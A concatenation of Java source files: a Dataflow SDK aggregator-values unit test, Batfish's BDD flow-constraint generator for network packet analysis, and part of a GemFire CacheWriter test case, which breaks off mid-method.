jobMetrics.setMetrics(ImmutableList.<MetricUpdate>of());
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<?> values = job.getAggregatorValues(aggregator);
assertThat(values.getValues(), empty());
}
@Test
public void testGetAggregatorValuesWithNullMetricUpdatesReturnsEmptyValue()
throws IOException, AggregatorRetrievalException {
Aggregator<?, ?> aggregator = mock(Aggregator.class);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
jobMetrics.setMetrics(null);
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<?> values = job.getAggregatorValues(aggregator);
assertThat(values.getValues(), empty());
}
@Test
public void testGetAggregatorValuesWithSingleMetricUpdateReturnsSingletonCollection()
throws IOException, AggregatorRetrievalException {
CombineFn<Long, long[], Long> combineFn = new Sum.SumLongFn();
String aggregatorName = "agg";
Aggregator<Long, Long> aggregator = new TestAggregator<>(combineFn, aggregatorName);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
MetricUpdate update = new MetricUpdate();
long stepValue = 1234L;
update.setScalar(new BigDecimal(stepValue));
MetricStructuredName structuredName = new MetricStructuredName();
structuredName.setName(aggregatorName);
structuredName.setContext(ImmutableMap.of("step", stepName));
update.setName(structuredName);
jobMetrics.setMetrics(ImmutableList.of(update));
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<Long> values = job.getAggregatorValues(aggregator);
assertThat(values.getValuesAtSteps(), hasEntry(fullName, stepValue));
assertThat(values.getValuesAtSteps().size(), equalTo(1));
assertThat(values.getValues(), contains(stepValue));
assertThat(values.getTotalValue(combineFn), equalTo(Long.valueOf(stepValue)));
}
@Test
public void testGetAggregatorValuesWithMultipleMetricUpdatesReturnsCollection()
throws IOException, AggregatorRetrievalException {
CombineFn<Long, long[], Long> combineFn = new Sum.SumLongFn();
String aggregatorName = "agg";
Aggregator<Long, Long> aggregator = new TestAggregator<>(combineFn, aggregatorName);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> otherTransform = mock(PTransform.class);
String otherStepName = "s88";
String otherFullName = "Spam/Ham/Eggs";
AppliedPTransform<?, ?, ?> otherAppliedTransform =
appliedPTransform(otherFullName, otherTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(
aggregator, pTransform, aggregator, otherTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(
appliedTransform, stepName, otherAppliedTransform, otherStepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
MetricUpdate updateOne = new MetricUpdate();
long stepValue = 1234L;
updateOne.setScalar(new BigDecimal(stepValue));
MetricStructuredName structuredNameOne = new MetricStructuredName();
structuredNameOne.setName(aggregatorName);
structuredNameOne.setContext(ImmutableMap.of("step", stepName));
updateOne.setName(structuredNameOne);
MetricUpdate updateTwo = new MetricUpdate();
long stepValueTwo = 1024L;
updateTwo.setScalar(new BigDecimal(stepValueTwo));
MetricStructuredName structuredNameTwo = new MetricStructuredName();
structuredNameTwo.setName(aggregatorName);
structuredNameTwo.setContext(ImmutableMap.of("step", otherStepName));
updateTwo.setName(structuredNameTwo);
jobMetrics.setMetrics(ImmutableList.of(updateOne, updateTwo));
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<Long> values = job.getAggregatorValues(aggregator);
assertThat(values.getValuesAtSteps(), hasEntry(fullName, stepValue));
assertThat(values.getValuesAtSteps(), hasEntry(otherFullName, stepValueTwo));
assertThat(values.getValuesAtSteps().size(), equalTo(2));
assertThat(values.getValues(), containsInAnyOrder(stepValue, stepValueTwo));
assertThat(values.getTotalValue(combineFn), equalTo(Long.valueOf(stepValue + stepValueTwo)));
}
@Test
public void testGetAggregatorValuesWithUnrelatedMetricUpdateIgnoresUpdate()
throws IOException, AggregatorRetrievalException {
CombineFn<Long, long[], Long> combineFn = new Sum.SumLongFn();
String aggregatorName = "agg";
Aggregator<Long, Long> aggregator = new TestAggregator<>(combineFn, aggregatorName);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
MetricUpdate ignoredUpdate = new MetricUpdate();
ignoredUpdate.setScalar(null);
MetricStructuredName ignoredName = new MetricStructuredName();
ignoredName.setName("ignoredAggregator.elementCount.out0");
ignoredName.setContext(null);
ignoredUpdate.setName(ignoredName);
jobMetrics.setMetrics(ImmutableList.of(ignoredUpdate));
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<Long> values = job.getAggregatorValues(aggregator);
assertThat(values.getValuesAtSteps().entrySet(), empty());
assertThat(values.getValues(), empty());
}
@Test
public void testGetAggregatorValuesWithUnusedAggregatorThrowsException()
throws AggregatorRetrievalException {
Aggregator<?, ?> aggregator = mock(Aggregator.class);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of().asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
thrown.expect(IllegalArgumentException.class);
thrown.expectMessage("not used in this pipeline");
job.getAggregatorValues(aggregator);
}
@Test
public void testGetAggregatorValuesWhenClientThrowsExceptionThrowsAggregatorRetrievalException()
throws IOException, AggregatorRetrievalException {
CombineFn<Long, long[], Long> combineFn = new Sum.SumLongFn();
String aggregatorName = "agg";
Aggregator<Long, Long> aggregator = new TestAggregator<>(combineFn, aggregatorName);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
IOException cause = new IOException();
when(getMetrics.execute()).thenThrow(cause);
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
thrown.expect(AggregatorRetrievalException.class);
thrown.expectCause(is(cause));
thrown.expectMessage(aggregator.toString());
thrown.expectMessage("when retrieving Aggregator values for");
job.getAggregatorValues(aggregator);
}
private static class TestAggregator<InT, OutT> implements Aggregator<InT, OutT> {
private final CombineFn<InT, ?, OutT> combineFn;
private final String name;
public TestAggregator(CombineFn<InT, ?, OutT> combineFn, String name) {
this.combineFn = combineFn;
this.name = name;
}
@Override
public void addValue(InT value) {
throw new AssertionError();
}
@Override
public String getName() {
return name;
}
@Override
public CombineFn<InT, ?, OutT> getCombineFn() {
return combineFn;
}
}
private AppliedPTransform<?, ?, ?> appliedPTransform(
String fullName, PTransform<PInput, POutput> transform) {
return AppliedPTransform.of(fullName, mock(PInput.class), mock(POutput.class), transform);
}
}
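// A minimal sketch (not part of the Dataflow SDK tests above) of the Mockito pattern that the
// setup() method relies on: each level of a fluent/chained API is mocked separately and wired
// together with when(...).thenReturn(...). The Service/Resource/Call names are hypothetical
// stand-ins for the Dataflow.Projects.Jobs-style nesting used in the real test.
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;

class ChainedStubSketch {
    interface Call { String execute(); }
    interface Resource { Call get(String id); }
    interface Service { Resource resource(); }

    static String fetch(Service service, String id) {
        return service.resource().get(id).execute();
    }

    public static void main(String[] args) {
        Service service = mock(Service.class);
        Resource resource = mock(Resource.class);
        Call call = mock(Call.class);
        // Wire each level of the chain so service.resource().get("job-1").execute() resolves.
        when(service.resource()).thenReturn(resource);
        when(resource.get("job-1")).thenReturn(call);
        when(call.execute()).thenReturn("DONE");
        System.out.println(fetch(service, "job-1")); // prints DONE
    }
}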
|
|
package org.batfish.common.bdd;
import static org.batfish.datamodel.PacketHeaderConstraintsUtil.DEFAULT_PACKET_LENGTH;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.collect.ImmutableList;
import io.opentracing.Scope;
import io.opentracing.Span;
import io.opentracing.util.GlobalTracer;
import java.util.List;
import net.sf.javabdd.BDD;
import org.batfish.common.BatfishException;
import org.batfish.datamodel.IcmpType;
import org.batfish.datamodel.Ip;
import org.batfish.datamodel.IpProtocol;
import org.batfish.datamodel.NamedPort;
import org.batfish.datamodel.Prefix;
/** This class generates common useful flow constraints as BDDs. */
public final class BDDFlowConstraintGenerator {
/** Allows a caller to express preferences on how packets should be retrieved. */
public enum FlowPreference {
/** Prefers ICMP over UDP over TCP. */
DEBUGGING,
/** Prefers TCP over UDP over ICMP. */
APPLICATION,
/**
* Prefers TCP over UDP over ICMP. Not currently different from {@link #APPLICATION}, but may
* change.
*/
TESTFILTER,
/** Prefers UDP traceroute. */
TRACEROUTE
}
@VisibleForTesting static final Prefix PRIVATE_SUBNET_10 = Prefix.parse("10.0.0.0/8");
@VisibleForTesting static final Prefix PRIVATE_SUBNET_172 = Prefix.parse("172.16.0.0/12");
@VisibleForTesting static final Prefix PRIVATE_SUBNET_192 = Prefix.parse("192.168.0.0/16");
@VisibleForTesting static final Prefix RESERVED_DOCUMENTATION_192 = Prefix.parse("192.0.2.0/24");
@VisibleForTesting
static final Prefix RESERVED_DOCUMENTATION_198 = Prefix.parse("198.51.100.0/24");
@VisibleForTesting
static final Prefix RESERVED_DOCUMENTATION_203 = Prefix.parse("203.0.113.0/24");
static final int UDP_TRACEROUTE_FIRST_PORT = 33434;
static final int UDP_TRACEROUTE_LAST_PORT = 33534;
private final BDDPacket _bddPacket;
private final BDDOps _bddOps;
private final List<BDD> _icmpConstraints;
private final List<BDD> _udpConstraints;
private final List<BDD> _tcpConstraints;
private final BDD _defaultPacketLength;
private final List<BDD> _ipConstraints;
private final BDD _udpTraceroute;
BDDFlowConstraintGenerator(BDDPacket pkt) {
Span span = GlobalTracer.get().buildSpan("construct BDDFlowConstraintGenerator").start();
try (Scope scope = GlobalTracer.get().scopeManager().activate(span)) {
assert scope != null; // avoid unused warning
_bddPacket = pkt;
_bddOps = new BDDOps(pkt.getFactory());
_defaultPacketLength = _bddPacket.getPacketLength().value(DEFAULT_PACKET_LENGTH);
_udpTraceroute = computeUdpTraceroute();
_icmpConstraints = computeICMPConstraint();
_udpConstraints = computeUDPConstraints();
_tcpConstraints = computeTCPConstraints();
_ipConstraints = computeIpConstraints();
}
}
private List<BDD> computeICMPConstraint() {
BDD icmp = _bddPacket.getIpProtocol().value(IpProtocol.ICMP);
BDDIcmpType type = _bddPacket.getIcmpType();
BDD codeZero = _bddPacket.getIcmpCode().value(0);
    // Prefer ICMP echo request, then anything with code 0, then anything ICMP.
return ImmutableList.of(
_bddOps.and(icmp, type.value(IcmpType.ECHO_REQUEST), codeZero),
_bddOps.and(icmp, codeZero),
icmp);
}
  private BDD ephemeralPort(BDDInteger portInteger) {
return portInteger.geq(NamedPort.EPHEMERAL_LOWEST.number());
}
private List<BDD> tcpPortPreferences(BDD tcp, BDDInteger tcpPort) {
return ImmutableList.of(
_bddOps.and(tcp, tcpPort.value(NamedPort.HTTP.number())),
_bddOps.and(tcp, tcpPort.value(NamedPort.HTTPS.number())),
_bddOps.and(tcp, tcpPort.value(NamedPort.SSH.number())),
// at least not zero if possible
_bddOps.and(tcp, tcpPort.value(0).not()));
}
private List<BDD> tcpFlagPreferences(BDD tcp) {
return ImmutableList.of(
// Force all the rarely used flags off
_bddOps.and(tcp, _bddPacket.getTcpCwr().not()),
_bddOps.and(tcp, _bddPacket.getTcpEce().not()),
_bddOps.and(tcp, _bddPacket.getTcpPsh().not()),
_bddOps.and(tcp, _bddPacket.getTcpUrg().not()),
// Less rarely used flags
_bddOps.and(tcp, _bddPacket.getTcpFin().not()),
// Sometimes used flags
_bddOps.and(tcp, _bddPacket.getTcpRst().not()),
// Prefer SYN, SYN_ACK, ACK
_bddOps.and(tcp, _bddPacket.getTcpSyn(), _bddPacket.getTcpAck().not()),
_bddOps.and(tcp, _bddPacket.getTcpAck(), _bddPacket.getTcpSyn()),
_bddOps.and(tcp, _bddPacket.getTcpAck()));
}
// Get TCP packets with special named ports, trying to find cases where only one side is
// ephemeral.
private List<BDD> computeTCPConstraints() {
BDDInteger dstPort = _bddPacket.getDstPort();
BDDInteger srcPort = _bddPacket.getSrcPort();
BDD tcp = _bddPacket.getIpProtocol().value(IpProtocol.TCP);
    BDD srcPortEphemeral = ephemeralPort(srcPort);
    BDD dstPortEphemeral = ephemeralPort(dstPort);
return ImmutableList.<BDD>builder()
// First, try to nudge src and dst port apart. E.g., if one is ephemeral the other is not.
.add(_bddOps.and(tcp, srcPortEphemeral, dstPortEphemeral.not()))
.add(_bddOps.and(tcp, srcPortEphemeral.not(), dstPortEphemeral))
// Next, execute port preferences.
.addAll(tcpPortPreferences(tcp, srcPort))
.addAll(tcpPortPreferences(tcp, dstPort))
// Next execute flag preferences.
.addAll(tcpFlagPreferences(tcp))
// Anything TCP.
.add(tcp)
.build();
}
  private List<BDD> udpPortPreferences(BDD udp, BDDInteger udpPort) {
    return ImmutableList.of(
        _bddOps.and(udp, udpPort.value(NamedPort.DOMAIN.number())),
        _bddOps.and(udp, udpPort.value(NamedPort.SNMP.number())),
        _bddOps.and(udp, udpPort.value(NamedPort.SNMPTRAP.number())),
        // at least not zero if possible
        _bddOps.and(udp, udpPort.value(0).not()));
}
private BDD computeUdpTraceroute() {
BDDInteger dstPort = _bddPacket.getDstPort();
BDDInteger srcPort = _bddPacket.getSrcPort();
BDD udp = _bddPacket.getIpProtocol().value(IpProtocol.UDP);
return _bddOps.and(
udp,
dstPort.range(UDP_TRACEROUTE_FIRST_PORT, UDP_TRACEROUTE_LAST_PORT),
srcPort.geq(NamedPort.EPHEMERAL_LOWEST.number()));
}
// Get UDP packets with special named ports, trying to find cases where only one side is
// ephemeral.
private List<BDD> computeUDPConstraints() {
BDDInteger dstPort = _bddPacket.getDstPort();
BDDInteger srcPort = _bddPacket.getSrcPort();
BDD udp = _bddPacket.getIpProtocol().value(IpProtocol.UDP);
    BDD srcPortEphemeral = ephemeralPort(srcPort);
    BDD dstPortEphemeral = ephemeralPort(dstPort);
return ImmutableList.<BDD>builder()
// Try for UDP traceroute.
.add(_udpTraceroute)
// Next, try to nudge src and dst port apart. E.g., if one is ephemeral the other is not.
.add(_bddOps.and(udp, srcPortEphemeral, dstPortEphemeral.not()))
.add(_bddOps.and(udp, srcPortEphemeral.not(), dstPortEphemeral))
// Next, execute port preferences
.addAll(udpPortPreferences(udp, srcPort))
.addAll(udpPortPreferences(udp, dstPort))
// Anything UDP.
.add(udp)
.build();
}
@VisibleForTesting
static BDD isPrivateIp(BDDOps ops, IpSpaceToBDD ip) {
return ops.or(
ip.toBDD(PRIVATE_SUBNET_10), ip.toBDD(PRIVATE_SUBNET_172), ip.toBDD(PRIVATE_SUBNET_192));
}
@VisibleForTesting
static BDD isDocumentationIp(BDDOps ops, IpSpaceToBDD ip) {
return ops.or(
ip.toBDD(RESERVED_DOCUMENTATION_192),
ip.toBDD(RESERVED_DOCUMENTATION_198),
ip.toBDD(RESERVED_DOCUMENTATION_203));
}
private static List<BDD> ipPreferences(BDDInteger ipInteger) {
return ImmutableList.of(
// First, one of the special IPs.
ipInteger.value(Ip.parse("8.8.8.8").asLong()),
ipInteger.value(Ip.parse("1.1.1.1").asLong()),
// Next, at least don't start with 0.
ipInteger.geq(Ip.parse("1.0.0.0").asLong()),
// Next, try to be in class A.
ipInteger.leq(Ip.parse("126.255.255.254").asLong()));
}
private List<BDD> computeIpConstraints() {
BDD srcIpPrivate = isPrivateIp(_bddOps, _bddPacket.getSrcIpSpaceToBDD());
BDD dstIpPrivate = isPrivateIp(_bddOps, _bddPacket.getDstIpSpaceToBDD());
return ImmutableList.<BDD>builder()
// 0. Try to not use documentation IPs if that is possible.
.add(isDocumentationIp(_bddOps, _bddPacket.getSrcIpSpaceToBDD()).not())
.add(isDocumentationIp(_bddOps, _bddPacket.getDstIpSpaceToBDD()).not())
// First, try to nudge src and dst IP apart. E.g., if one is private the other should be
// public.
.add(_bddOps.and(srcIpPrivate, dstIpPrivate.not()))
.add(_bddOps.and(srcIpPrivate.not(), dstIpPrivate))
// Next, execute IP preferences
.addAll(ipPreferences(_bddPacket.getSrcIp()))
.addAll(ipPreferences(_bddPacket.getDstIp()))
.build();
}
public List<BDD> generateFlowPreference(FlowPreference preference) {
switch (preference) {
case DEBUGGING:
return ImmutableList.<BDD>builder()
.addAll(_icmpConstraints)
.addAll(_udpConstraints)
.addAll(_tcpConstraints)
.addAll(_ipConstraints)
.add(_defaultPacketLength)
.build();
case APPLICATION:
case TESTFILTER:
return ImmutableList.<BDD>builder()
.addAll(_tcpConstraints)
.addAll(_udpConstraints)
.addAll(_icmpConstraints)
.addAll(_ipConstraints)
.add(_defaultPacketLength)
.build();
case TRACEROUTE:
return ImmutableList.<BDD>builder()
.addAll(_udpConstraints)
.addAll(_tcpConstraints)
.addAll(_icmpConstraints)
.addAll(_ipConstraints)
.add(_defaultPacketLength)
.build();
default:
        throw new BatfishException("Unsupported flow preference");
}
}
}
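// A minimal sketch (not part of Batfish) of how an ordered preference list such as the one
// returned by generateFlowPreference(...) is typically consumed: each constraint is AND-ed onto
// the current solution only when the result stays satisfiable, so earlier (higher-priority)
// preferences win and later ones can only refine, never empty, the solution. The helper class
// below is illustrative only; it assumes the standard JavaBDD and(...)/isZero() operations.
import java.util.List;
import net.sf.javabdd.BDD;

final class FlowPreferenceApplierSketch {
  private FlowPreferenceApplierSketch() {}

  /** Refines {@code solution} with every preference that keeps it satisfiable. */
  static BDD applyPreferences(BDD solution, List<BDD> preferences) {
    BDD current = solution;
    for (BDD preference : preferences) {
      BDD refined = current.and(preference); // conjunction of the solution and this preference
      if (!refined.isZero()) {               // keep the refinement only if still satisfiable
        current = refined;
      }
    }
    return current;
  }
}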
|
|
/*
* Copyright (c) 2010-2015 Pivotal Software, Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you
* may not use this file except in compliance with the License. You
* may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied. See the License for the specific language governing
* permissions and limitations under the License. See accompanying
* LICENSE file.
*/
package com.gemstone.gemfire.cache30;
import com.gemstone.gemfire.cache.*;
/**
* An abstract class whose test methods test the functionality of
* {@link CacheWriter}s that are invoked locally.
*
* @see MultiVMRegionTestCase#testRemoteCacheWriter
*
* @author David Whitlock
*
* @since 3.0
*/
public abstract class CacheWriterTestCase
extends RegionAttributesTestCase {
public CacheWriterTestCase(String name) {
super(name);
}
/////////////////////// Test Methods ///////////////////////
/**
* Tests that the <code>CacheWriter</code> is called before an entry
* is {@linkplain CacheWriter#beforeCreate created}.
*/
public void testCacheWriterBeforeCreate() throws CacheException {
String name = this.getUniqueName();
final Object key = this.getUniqueName();
final Object value = new Integer(42);
final Object arg = "ARG";
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
public void beforeCreate2(EntryEvent event)
throws CacheWriterException {
assertEquals(key, event.getKey());
assertEquals(value, event.getNewValue());
assertNull(event.getOldValue());
assertTrue(event.getOperation().isCreate());
assertFalse(event.getOperation().isLoad());
assertFalse(event.getOperation().isLocalLoad());
assertFalse(event.getOperation().isNetLoad());
assertFalse(event.getOperation().isNetSearch());
Object argument = event.getCallbackArgument();
if (argument != null) {
if (argument.equals(exception)) {
String s = "Test CacheWriterException";
throw new CacheWriterException(s);
} else {
assertEquals(arg, argument);
}
}
}
public void beforeDestroy2(EntryEvent event)
throws CacheWriterException {
// This method will get invoked when the region is populated
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
Region region =
createRegion(name, factory.create());
region.create(key, value);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.put(key, value);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, value, arg);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.put(key, value, arg);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
try {
region.create(key, value, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
try {
region.put(key, value, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
}
/**
* Tests that the <code>CacheWriter</code> is called before an entry
* is {@linkplain CacheWriter#beforeUpdate updated}.
*/
public void testCacheWriterBeforeUpdate() throws CacheException {
String name = this.getUniqueName();
final Object key = this.getUniqueName();
final Object oldValue = new Integer(42);
final Object newValue = new Integer(43);
final Object arg = "ARG";
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
public void beforeCreate2(EntryEvent event)
throws CacheWriterException {
// This method will get invoked when the region is populated
}
public void beforeDestroy2(EntryEvent event)
throws CacheWriterException {
// This method will get invoked when the region is populated
}
public void beforeUpdate2(EntryEvent event)
throws CacheWriterException {
assertEquals(key, event.getKey());
assertEquals(newValue, event.getNewValue());
assertEquals(oldValue, event.getOldValue());
assertTrue(event.getOperation().isUpdate());
assertFalse(event.getOperation().isLoad());
assertFalse(event.getOperation().isLocalLoad());
assertFalse(event.getOperation().isNetLoad());
assertFalse(event.getOperation().isNetSearch());
Object argument = event.getCallbackArgument();
if (argument != null) {
if (argument.equals(exception)) {
String s = "Test CacheWriterException";
throw new CacheWriterException(s);
} else {
assertEquals(arg, argument);
}
}
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
Region region =
createRegion(name, factory.create());
region.create(key, oldValue);
assertTrue(writer.wasInvoked());
region.put(key, newValue);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.put(key, oldValue);
assertTrue(writer.wasInvoked());
region.put(key, newValue);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, oldValue);
assertTrue(writer.wasInvoked());
region.put(key, newValue, arg);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.put(key, oldValue);
assertTrue(writer.wasInvoked());
region.put(key, newValue, arg);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, oldValue);
assertTrue(writer.wasInvoked());
try {
region.put(key, newValue, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, oldValue);
assertTrue(writer.wasInvoked());
try {
region.put(key, newValue, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
}
/**
* Tests that the <code>CacheWriter</code> is called before an entry
* is {@linkplain CacheWriter#beforeDestroy destroyed}.
*/
public void testCacheWriterBeforeDestroy() throws CacheException {
String name = this.getUniqueName();
final Object key = this.getUniqueName();
final Object value = new Integer(42);
final Object arg = "ARG";
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
public void beforeCreate2(EntryEvent event)
throws CacheWriterException {
// This method will get invoked when the region is populated
}
public void beforeDestroy2(EntryEvent event)
throws CacheWriterException {
assertEquals(key, event.getKey());
assertEquals(value, event.getOldValue());
assertNull(event.getNewValue());
assertTrue(event.getOperation().isDestroy());
assertFalse(event.getOperation().isLoad());
assertFalse(event.getOperation().isLocalLoad());
assertFalse(event.getOperation().isNetLoad());
assertFalse(event.getOperation().isNetSearch());
Object argument = event.getCallbackArgument();
if (argument != null) {
if (argument.equals(exception)) {
String s = "Test CacheWriterException";
throw new CacheWriterException(s);
} else {
assertEquals(arg, argument);
}
}
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
Region region =
createRegion(name, factory.create());
region.create(key, value);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, value);
assertTrue(writer.wasInvoked());
region.destroy(key, arg);
assertTrue(writer.wasInvoked());
region.create(key, value);
assertTrue(writer.wasInvoked());
try {
region.destroy(key, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
}
}
/**
* Tests that the <code>CacheWriter</code> is called before a region
* is destroyed.
*
* @see CacheWriter#beforeRegionDestroy
* @see CacheWriter#close
*/
public void testCacheWriterBeforeRegionDestroy()
throws CacheException {
final String name = this.getUniqueName();
final Object arg = "ARG";
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
private boolean closed = false;
private boolean destroyed = false;
public boolean wasInvoked() {
boolean value = closed && destroyed;
super.wasInvoked();
return value;
}
public void close2() {
this.closed = true;
}
public void beforeRegionDestroy2(RegionEvent event)
throws CacheWriterException {
assertEquals(name, event.getRegion().getName());
// this should be a distributed destroy unless the region
// is local scope
assertTrue(event.getOperation().isRegionDestroy());
assertFalse(event.getOperation().isExpiration());
assertFalse(event.isOriginRemote());
Object argument = event.getCallbackArgument();
if (argument != null) {
if (argument.equals(exception)) {
String s = "Test CacheWriterException";
throw new CacheWriterException(s);
} else {
assertEquals(arg, argument);
}
}
